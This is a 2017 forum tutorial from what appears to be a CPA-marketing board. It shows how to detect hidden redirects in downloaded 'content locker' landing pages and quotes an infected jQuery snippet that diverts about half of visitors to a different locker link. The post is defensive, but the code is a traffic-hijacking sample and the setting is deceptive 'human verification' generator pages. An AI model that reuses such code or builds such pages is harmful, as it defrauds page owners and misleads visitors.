Announcement Protect Your Self From Sneaky Landing Page Redirects (Tutorial)
2017-08-14, 09:07 PM,
#1
After catching multiple infected Landing Pages in the section we decided to make this thread to help protect the users from using any infected LP that redirects a certain % of traffic to a different locker.

This should be short and simple
I would also like point out that if you want to report any infected Landing Pages / Scripts, you should send the suspicious code in a quote alongside a URL of the thread through a PM to:
HawkEye
Watt
LB'Decoy

So now let me begin explaining the tutorial and i'll be using a recent Infected Landing Page as an example.

Once you download the LP zip file & extract it, you should always look for the index.html file and open it in a notepad / Sublime Text or any other similar utility.

But in this example the creator of the LP had 2 index files

[Image: -XJ7F6BlQcq7iqf5-4XVog.png]

Opening the first Index file will redirect to the real LP which is in Index-2.html
Which is where you should look for the locker code which most of the time it's linked with a button/image:

[Image: 6sLa_R-rQ92tosNJtL2Tjg.png]

As you can see, this is not a "OnClick" prompt which means, as soon as anyone clicks on the button they'll be redirected to a link instead.

Notice how the ID is named as
Code:
first-step-button-verify
as long as it's there that means it's linked to a JavaScript file.

So what you need to do is to search for ANY Javascript file in the LP's documents and only search for that ID (first-step-button-verify)

After filtering the document according to files type i can see all the javascript files above each other, the first thing my eyes looked at is this file:

[Image: cVxKRZxkQc6wdC4KqScEkQ.png]

Why Jquery? cause i caught most of the suspicious codes in so much infected LPs in such files, but that doesn't mean that you should not look on the other files as some people would make the extra step & hide the redirection in a different file.

So after opening the Jquery file i saw this:

[Image: wkzCnkQLR-aInWsGQkOzdQ.png]

Quote:if(document.getElementById("first-step-button-verify").href!="https://www.areyouahuman.co/cl.php?id=bdb328282d7dd9d25a1b26e8009b26e1") {
0>window.location.href.toString().indexOf("http://unlimitedapps.online/human-verification/generator.html")&&0==Math.floor(100*Math.random()/50)&&(window.onload=function(){document.getElementById("first-step-button-verify").href="https://www.humanverify.net/cl.php?id=49dc4de106fa33cad1e0fe33976fb1e2"});
}

Which is exactly what we were looking for!
After finding it you should try & read the code & find any suspicious lines such as links/a code for redirecting to Another file, and so on!
And for this example i found a code of a string that's linked to another new locker link

Which is by far means that this code was meant to redirect %50 of the traffic to the 2nd locker link if the "First" locker link was removed/replaced.

I went ahead and tested the page and whenever you change the locker link in the "Index-2.html" page, every time you load the page twice the "2nd" link locker which was found in the Jquery file will appear instead of yours.

So the fix for this is to simply delete the whole "Jquery" file which contains the suspicious code.

IMO once you find a infected LP, i wouldn't recommend using it even after you clean it.

If you guys have any questions, i'll be happy to answer you through PM

Stay safe & as i sometimes say, if you ever earn enough $$ you should step up and invest money in your Landing Pages.

Have a great day!

Latest Thanks - View all

Watt(2017-08-15 10:24 AM) 

If You Think That Any Of The Staff Team Is Using Their Privileges In A Wrong Manner
You Can Always Contact The Admin → HawkEye


Possibly Related Threads...
Thread Author Replies Views Last Post
  OGAds - Weekly Payments - Landing Pages - Mentor - Hot Offers OGAds 365 48,381 Yesterday, 08:29 AM
Last Post: OGAds
  landing page/prelander question Hypebeast 3 169 2017-10-12, 11:17 AM
Last Post: NAPK1NS
  GOT Landing Page CagelessBrain 8 192 2017-10-11, 03:58 PM
Last Post: Mr. Tokyo
  Hello. I need help with a landing page. V4P0RW4V3 2 155 2017-10-11, 09:04 AM
Last Post: lizha11
  How To Detect get Script In Landing Page 5light 3 140 2017-10-05, 04:04 AM
Last Post: LB'Decoy




About Us | Contact Us | CPA Elites | Advertise | Stats | Staff Team

© 2013-2017 CPA Elites Ltd
Enhanced by MyBB and WallBB
Return to top